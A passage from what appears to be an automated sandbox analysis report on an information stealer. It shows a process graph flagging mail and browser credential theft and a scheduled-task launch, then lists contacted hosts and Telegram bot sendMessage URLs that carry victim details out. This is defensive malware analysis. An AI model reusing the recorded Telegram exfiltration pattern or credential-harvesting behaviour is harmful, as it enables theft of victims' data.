dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 NuDUTBObHpKADz.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 49821, 49834 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 193.122.6.168, 49720, 49740, 49741 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 188.114.97.3, 443, 49727, 49734 CLOUDFLARENETUS European Union 17->50 32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.75 false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		high
        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
          		high